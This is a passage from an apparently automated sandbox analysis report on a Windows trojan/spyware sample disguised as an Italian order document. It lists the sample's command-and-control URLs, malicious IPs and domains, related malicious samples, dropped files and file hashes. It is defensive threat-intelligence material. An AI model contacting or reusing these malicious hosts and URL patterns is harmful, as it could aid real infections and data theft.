                                              http://www.heroclassicrally.co.ukReferer:explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.otopodlogi.comexplorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.jewelryimpact.com/vqh7/?4sHXq=qmMaHdA-N1MF&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eexplorer.exe, 00000002.00000002.537406866.00000000156B8000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.525637828.0000000005AE0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.525015381.0000000003A98000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.nkgtrust.orgexplorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.jewelryimpact.com/vqh7/explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tobinrasheedja.cyou/vqh7/explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drfalse
                                                		high
                                                http://www.litespeedtech.com/error-pageexplorer.exe, 00000002.00000002.537406866.0000000016024000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.525015381.0000000004404000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  http://www.awc.icuReferer:explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.krankenzusatz.netReferer:explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.otopodlogi.comReferer:explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.krankenzusatz.net/vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6esvchost.exe, 0000000B.00000002.525015381.0000000004272000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=50-ET7Wv7.11.drfalse
                                                    		high
                                                    http://www.nkgtrust.orgReferer:explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchsvchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drfalse
                                                      		high
                                                      http://www.readyexechub.com/vqh7/explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=svchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drfalse
                                                        		high
                                                        http://www.heroclassicrally.co.ukexplorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ac.ecosia.org/autocomplete?q=50-ET7Wv7.11.drfalse
                                                          		high
                                                          https://search.yahoo.com?fr=crmas_sfpsvchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drfalse
                                                            		high
                                                            http://www.verde-amar.infoexplorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.readyexechub.comexplorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.treebarktees.comexplorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tobinrasheedja.cyouReferer:explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.hotelyeah.top/vqh7/K6jNexplorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.jewelryimpact.comexplorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.awc.icu/vqh7/oexplorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=50-ET7Wv7.11.drfalse
                                                              		high
                                                              http://www.hotelyeah.topReferer:explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.otopodlogi.com/vqh7/explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              199.192.22.198
                                                              		www.specigain.onlineUnited States
                                                              		22612NAMECHEAP-NETUStrue
                                                              148.251.13.126
                                                              		gachthe365.siteGermany
                                                              		24940HETZNER-ASDEtrue
                                                              91.195.240.117
                                                              		www.nativealternatives.comGermany
                                                              		47846SEDO-ASDEtrue
                                                              81.169.145.158
                                                              		krankenzusatz.netGermany
                                                              		6724STRATOSTRATOAGDEtrue
                                                              81.169.145.72
                                                              		frogair.onlineGermany
                                                              		6724STRATOSTRATOAGDEtrue
                                                              81.17.18.198
                                                              		www.jewelryimpact.comSwitzerland
                                                              		51852PLI-ASCHtrue
                                                              103.191.208.50
                                                              		treebarktees.comunknown
                                                              		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                              75.102.22.168
                                                              		hotelyeah.topUnited States
                                                              		23352SERVERCENTRALUStrue

                                                              General Information

                                                              Joe Sandbox Version:36.0.0 Rainbow Opal
                                                              Analysis ID:803902
                                                              Start date and time:2023-02-10 12:43:10 +01:00
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 10m 49s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of analysed new started processes analysed:13
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:1
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample file name:Requisito ordine n. 230210.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@8/2@13/8
                                                              EGA Information:
                                                              • Successful, ratio: 75%
                                                              HDC Information:
                                                              • Successful, ratio: 61% (good quality ratio 54.5%)
                                                              • Quality average: 71%
                                                              • Quality standard deviation: 32.5%
                                                              HCA Information:
                                                              • Successful, ratio: 88%
                                                              • Number of executed functions: 112
                                                              • Number of non-executed functions: 216
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, svchost.exe
                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                              • Execution Graph export aborted for target Requisito ordine n. 230210.exe, PID 5816 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • VT rate limit hit for: Requisito ordine n. 230210.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              12:44:23API Interceptor578x Sleep call for process: explorer.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              199.192.22.198WKPSNTQR90002023.com.exeGet hashmaliciousBrowse
                                                              • www.dealsharp.site/ae5v/
                                                              Pneumographic.exeGet hashmaliciousBrowse
                                                              • www.prosmarketing.site/ngqb/?RAGsfTD=NguoeGzcpL7UkEEeChpXGjG7jmqVJPtPDkvQqkNiDKsZHeCWJnk/oubf0CkcnhoZgfk7vag0RAETy5D1/cqboZKrL8ySGaeg7Q==&Y4Ln=PPCF
                                                              abc.exeGet hashmaliciousBrowse
                                                              • www.dealsharp.site/ae5v/?2-=ffWnii2d1IOkQfE0&ZgVA7L=mQsIAJu5cwKKzfEUTd3WgxsprbXsvYWpFqma/PwmJtajBcawxtoo/w0l9IrkuRc/KKZ1RmdE8D8D31QFelduhIXs5Mcu1WWpUg==
                                                              148.251.13.126AR_STATEMENT_13740_ARIHANT ELECTRI_02JEN06_115700.exeGet hashmaliciousBrowse
                                                              • www.gachthe365.site/gzrd/?A6col=EjRsT9T-NeK9ubli&JHPrc6=h3es83l2foBx4r4xJRoZE+Kl4otA9A7bbE6/VUwZkLki+LX7SIT1t5FYmuRz0tiPKFATBhXFTqAFqPhJyQeda1hMPHL4Sh0jsQ==
                                                              w1eTBSkNeG.exeGet hashmaliciousBrowse
                                                              • www.gachthe365.site/ai0o/?dGwSL2sl=0fTmduLjnMiUfOdt/TgIod/bzwvOJi8VHR8gkr9JHy/UWyyhzI2aQBVmKCvXDesKhpY7TGy+nn+0Mghhd0uF+KQXqAo2fY3XBQ==&lgTWz=PjPbkV
                                                              PO #U201c011437824.exeGet hashmaliciousBrowse
                                                              • www.gachthe365.site/ai0o/?uceQ=0fTmduLjnMiUfOdt/TgIod/bzwvOJi8VHR8gkr9JHy/UWyyhzI2aQBVmKCvXDesKhpY7TGy+nn+0Mghhd0uF+KQXqAo2fY3XBQ==&CCjVG=uscOzgXpKy
                                                              91.195.240.117PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                              • www.firebirds-softball.org/t36v/?mH9nLS=s7RQk9b3q80jPn3Zvv4oYcqEUyB69iqewWZ24Vjuh+/Pvu4iHWMsYR1llVeQfTMLbHzJPptVJdUMnxJcq8HNhsOTAKA+MPoo4A==&bj=McilDOcmcTnvzCRO
                                                              captain.exeGet hashmaliciousBrowse
                                                              • www.hubyazilim.com/ghii/?Z-y-ON=FXxQJAlmPf&5B=2K2NHyQWu2C8/rgVX1vHKTtef6ApytgwLa2EVVkQrb8caG7fKJiILTd9UXVvcQ44mr4Jwpyj4o8MhJQLFkVmLr55BQQOA1kU8g==
                                                              Pneumographic.exeGet hashmaliciousBrowse
                                                              • www.firebirds-softball.org/ngqb/?RAGsfTD=bltz2RMpWAwQ9HiNM+75SGCvZDCGWq7xymZthpw75vwjEvcr02kxRnEkMN+CBl95Yyf6LSBx/K/XAzfVr2HewxPhqjsLB/rY8g==&Y4Ln=PPCF
                                                              AR_STATEMENT_13740_ARIHANT ELECTRI_02JEN06_115700.exeGet hashmaliciousBrowse
                                                              • www.stainawl.com/gzrd/?JHPrc6=3R2Dm611DI0tRHXKpaD7MD0fnc0hzr8erPu/EdhDVq+wLa+HDAzBhHevVUzOcBgrFXAWyxaM4d3R6ZhnUVW9OtdsSD/BFDXMnA==&A6col=EjRsT9T-NeK9ubli
                                                              JOB 20230125 RFQ - TECHNOFITME.jsGet hashmaliciousBrowse
                                                              • www.firebirds-softball.org/cf3e/?47J=aV1kELQwrkQGTOHewTGLIZsBq7jPIayCMRAfYzHvesmCIU0VnCuZJ7dsA2kWHluJ5pDz8Qq0C/oJT8FwPPJ1tEYruj4F/3RHIUGwc/1S+rMG&BlOd=iQTna
                                                              evE52YU66U.exeGet hashmaliciousBrowse
                                                              • www.mycutsalon.com/je73/?S6AlwzQ=vsJlVVKPLSfYYsPW2Mgz2LY+aJwT+tOs5nEIerLtN6Veq2jNq3kV+5tD6JhkmQO4l2m1&i4m0=Ork8kDKpXtaPq
                                                              RFQ_#001311022.exeGet hashmaliciousBrowse
                                                              • www.shopprettytees.com/th47/?9rhHaH5=C+qgS0p2/jWO+pE3Yp4OTnsQjNDnGMD0XT4POf3TW13c+elF3PvxQYDA+XVBI+SBKPH2&g6AlZl=2dm4nRIhP62X
                                                              Payment Advice [209TRAPA00138253].vbsGet hashmaliciousBrowse
                                                              • www.dashandtulip.com/al24/
                                                              RFQ-PR. No.1599-Rev.2.exeGet hashmaliciousBrowse
                                                              • www.mariefrank.shop/fkku/?U2Jxi=lLIk5eiAD6zBa54I0bF1SJhg7zHvYAq9CB3NwwI8Wm0hBeJH3WBhJDmfWHmKofzG6g89DWuLb3wH0UNWMWKmuV+YRu4aYTwhNg==&V0DPP=5j-XJnYH
                                                              bpEsy2PcnK.exeGet hashmaliciousBrowse
                                                              • www.naileasboutique.com/tsuz/?8pQP=twzH7uTv06lDZg7wYC6/Kf83dJbtJfRyQrtRHAv9ficmGfDly6hFtVoOKQR1MNC4oErDubBZLGlqAFyeNAg/ud4A92qrZosIHg==&UdZ=LFNDcvupZHbp
                                                              PO 9419(Draft copy).vbsGet hashmaliciousBrowse
                                                              • www.dumpsterdave.net/al24/
                                                              FxI8KH8VlZ.vbsGet hashmaliciousBrowse
                                                              • www.dashandtulip.com/al24/
                                                              INV_payment_copy_HSBc03102022000000000000000PDF.exeGet hashmaliciousBrowse
                                                              • www.mariefrank.shop/ubpr/?-Z=veRK2MFShNTtYshsKZx8SDRc8ppW7sF6qNGD2CrsLnU7TpDH/Wb3TTMtD5PqNGckdXMzhYN27d1JsDnYt5eU64fPoePC86A8hQ==&v6AdXf=eVZlYj_px2
                                                              Netanya Farm project (Phase II).vbsGet hashmaliciousBrowse
                                                              • www.dumpsterdave.net/al24/
                                                              Wed19b7cd8faf1.exeGet hashmaliciousBrowse
                                                              • asfaltwerk.com/upload/
                                                              Emask230921doc.exeGet hashmaliciousBrowse
                                                              • www.arthritiscompressiongloves.com/x9r4/?7n0=R48xY&c2Jp7Bc0=ATFPyyXR6WBbOtqpKjrbfg8Vw0Bv/XD6vwihZkRsadJTg49q6bOheuY+uuxUAujekOit
                                                              Yy788lmJnh.exeGet hashmaliciousBrowse
                                                              • www.dollyvee.com/b6a4/?7nIpkb=7Ma1uFfLw3XsBFAx93/nTuvNRWfdfzafPuXd0dAAaBxnPyFu4w8MLvRf45dhaXe4nkbH&-Zi=7nQl
                                                              TvDtddRoJP.exeGet hashmaliciousBrowse
                                                              • www.handelsbetriebposavec.com/if60/?i4=BP+CXvJKJ+qi+ASDTt40c+H20Oo8l6kN5b8+CsJHg+FxqtAGDNIul7ZmJPmWQrm8iARdlHjrCQ==&4hiPP=2dDdWRs
                                                              New Order Specifications.exeGet hashmaliciousBrowse
                                                              • www.ahlstromclothes.com/ssee/?LB_8RH=MhdemHby4eJzARfVnWQ6LcCJmvLgyMCJzQ3B3FORQKcf+2rLbU5Qlle6Xut7yEH71UBP&Shy=7nUtX
                                                              Abn order 55.docGet hashmaliciousBrowse
                                                              • www.daisyshouseofshade.com/bckt/?wl50w=S43CZTguyAZMFxlQfxWV8dbLMf80pI5RBqoH9J0bWWS7tq2avjd9D5aueoUBx5eNu4goIA==&eL0dq=obSpz2dXnPNlX

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              www.jewelryimpact.comb2mb9ypaoG.exeGet hashmaliciousBrowse
                                                              • 81.17.29.148

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              HETZNER-ASDEfl47EOJvPm.exeGet hashmaliciousBrowse
                                                              • 148.251.234.93
                                                              4Z5TqiULwM.oneGet hashmaliciousBrowse
                                                              • 144.76.136.153
                                                              NKbeNpbGvc.exeGet hashmaliciousBrowse
                                                              • 148.251.234.93
                                                              qrjyNyZGJT.exeGet hashmaliciousBrowse
                                                              • 144.76.136.153
                                                              JIAFF7kQzM.exeGet hashmaliciousBrowse
                                                              • 144.76.136.153
                                                              prog.apkGet hashmaliciousBrowse
                                                              • 144.76.58.8
                                                              82ZpQnMRM4.exeGet hashmaliciousBrowse
                                                              • 144.76.136.153
                                                              IQ02072023.jsGet hashmaliciousBrowse
                                                              • 144.76.136.153
                                                              SOA 7105294.exeGet hashmaliciousBrowse
                                                              • 46.4.214.202
                                                              SOA 7105294.exeGet hashmaliciousBrowse
                                                              • 46.4.214.202
                                                              file.exeGet hashmaliciousBrowse
                                                              • 144.76.136.153
                                                              file.exeGet hashmaliciousBrowse
                                                              • 144.76.136.153
                                                              273F433BA1CEBFAD830E52490A04CA744351FC4624928.exeGet hashmaliciousBrowse
                                                              • 148.251.234.93
                                                              TTRef06022301.exeGet hashmaliciousBrowse
                                                              • 88.99.90.21
                                                              TTreff2092023.exeGet hashmaliciousBrowse
                                                              • 88.99.90.21
                                                              SecureMessageAtt.htmlGet hashmaliciousBrowse
                                                              • 95.217.36.56
                                                              SoLOfA6ezK.exeGet hashmaliciousBrowse
                                                              • 116.203.231.217
                                                              file.exeGet hashmaliciousBrowse
                                                              • 148.251.234.93
                                                              file.exeGet hashmaliciousBrowse
                                                              • 148.251.234.93
                                                              Shipping Document.exeGet hashmaliciousBrowse
                                                              • 46.4.214.202
                                                              NAMECHEAP-NETUSSHIPPING DOCUMENT.exeGet hashmaliciousBrowse
                                                              • 192.64.115.133
                                                              CaixaBank_ Documento de Pago_Pdf.imgGet hashmaliciousBrowse
                                                              • 198.54.116.34
                                                              DSG2011001_INV+PL (3).exeGet hashmaliciousBrowse
                                                              • 192.64.115.133
                                                              WKPSNTQR90002023.com.exeGet hashmaliciousBrowse
                                                              • 199.192.22.198
                                                              HSBC Payment Advice_pdf.exeGet hashmaliciousBrowse
                                                              • 192.64.115.133
                                                              DSG2011001_INV+PL.exeGet hashmaliciousBrowse
                                                              • 192.64.115.133
                                                              LISTA DE ART#U00cdCULOS.exeGet hashmaliciousBrowse
                                                              • 198.54.117.212
                                                              https://protection.greathorn.com/services/v2/lookupUrl/4392ec29-0762-4274-87b0-517ddfd9cd2a/1555/54b179ad5016a5e46356f444c9fb61bef91ba722?domain=news.pharmasalmanac.com&path=/SpecialFunctions/Newsletters/etr.aspxGet hashmaliciousBrowse
                                                              • 198.187.29.27
                                                              http://news.pharmasalmanac.com/SpecialFunctions/Newsletters/etr.aspx?urlencode=true&n=8669&s=618957&destination=http://Aims-intl.softsport24.com/Kintonl/a2ludG9ubEBhaW1zLWludGwuY29tGet hashmaliciousBrowse
                                                              • 198.187.29.27
                                                              https://powerandroid.in/now/new/Jeffdavislawfirm/manuele@jeffdavislawfirm.comGet hashmaliciousBrowse
                                                              • 198.54.116.141
                                                              JS410Y5107.exeGet hashmaliciousBrowse
                                                              • 199.192.30.193
                                                              http://us.content.exclaimer.net/?url=http%3A%2F%2Falgoma.com.paintechnology.in%3A%2F%2F?email=michael.vaz@algoma.comGet hashmaliciousBrowse
                                                              • 199.188.200.94
                                                              LIST.exeGet hashmaliciousBrowse
                                                              • 198.54.117.216
                                                              tmp112E.htmlGet hashmaliciousBrowse
                                                              • 199.192.29.215
                                                              SHIPPING DOCUMENT.exeGet hashmaliciousBrowse
                                                              • 192.64.115.133
                                                              DSG2011001_INV+PL.exeGet hashmaliciousBrowse
                                                              • 192.64.115.133
                                                              captain.exeGet hashmaliciousBrowse
                                                              • 198.54.117.211
                                                              Pneumographic.exeGet hashmaliciousBrowse
                                                              • 199.192.22.198
                                                              https://email.franchisedirect.com/Prod/link-tracker?redirectUrl=http://Klp.tvparlour.com/Ae/YWVAa2xwLm5v&sig=ANcyrcQ7bCEk5Dj3E68RqaYiBGjMHqN6mSEReKLsJKq1&iat=1669043641&a=%7C%7C649518235%7C%7C&account=https://google.com&email=gyRMXpx%2BKJbHl%2BXq5LNC5w%2FoAQY7wIKwevAKcx2CvIo%3D&s=be72a29c71989238fcc9e3727911b5ee&i=10801A11253A16A137114Get hashmaliciousBrowse
                                                              • 198.54.116.52
                                                              TT SLIP.exeGet hashmaliciousBrowse
                                                              • 198.54.117.242

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Requisito ordine n. 230210.exe.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\Requisito ordine n. 230210.exe
                                                              File Type:CSV text
                                                              Category:dropped
                                                              Size (bytes):226
                                                              Entropy (8bit):5.354940450065058
                                                              Encrypted:false
                                                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                              MD5:B10E37251C5B495643F331DB2EEC3394
                                                              SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                              SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                              SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

                                                              C:\Users\user\AppData\Local\Temp\50-ET7Wv7

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):94208
                                                              Entropy (8bit):1.2882898331044472
                                                              Encrypted:false
                                                              SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                              MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                              SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                              SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                              SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              Static File Info

                                                              General

                                                              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.891836515716611
                                                              TrID:
                                                              • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                              • Win64 Executable GUI (202006/5) 46.43%
                                                              • Win64 Executable (generic) (12005/4) 2.76%
                                                              • Generic Win/DOS Executable (2004/3) 0.46%
                                                              • DOS Executable Generic (2002/1) 0.46%
                                                              File name:Requisito ordine n. 230210.exe
                                                              File size:734720
                                                              MD5:39f9f9780aff067b147b7adffb960c05
                                                              SHA1:30a987113262a366112c8cb91136535abba1b973
                                                              SHA256:478bd9421ff11177d8974922f1eec334f1af15845054ce1dbc42b1c9bbd4a484
                                                              SHA512:df02dc1816bc3ebb934ff10d60590691f42f752ada99803d79031dcc5d3696ce8ea773ead0e1c6f931ca608888a3faee191cf44fb4612e6ae34a29a546d361ad
                                                              SSDEEP:12288:YnG998abzi2ehUMAgpTIEIaszs0lVwpnSMFs+y65tJmtyOOgbOzARHh3qF1uguQi:Yu9pi21y5I5a+Nl6S+DJmsah3qF1ulb
                                                              TLSH:55F4020A33885F0AD84984B4C6FB1A3142F7A9977377D6897F4581E11E017E99DCBBC8
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...V.................0.................. ....@...... ....................................`...@......@............... .....

                                                              File Icon

                                                              Icon Hash:00828e8e8686b000

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x400000
                                                              Entrypoint Section:
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0xD115FA56 [Thu Feb 27 10:41:26 2081 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:

                                                              Entrypoint Preview

                                                              Instruction
                                                              dec ebp
                                                              pop edx
                                                              nop
                                                              add byte ptr [ebx], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
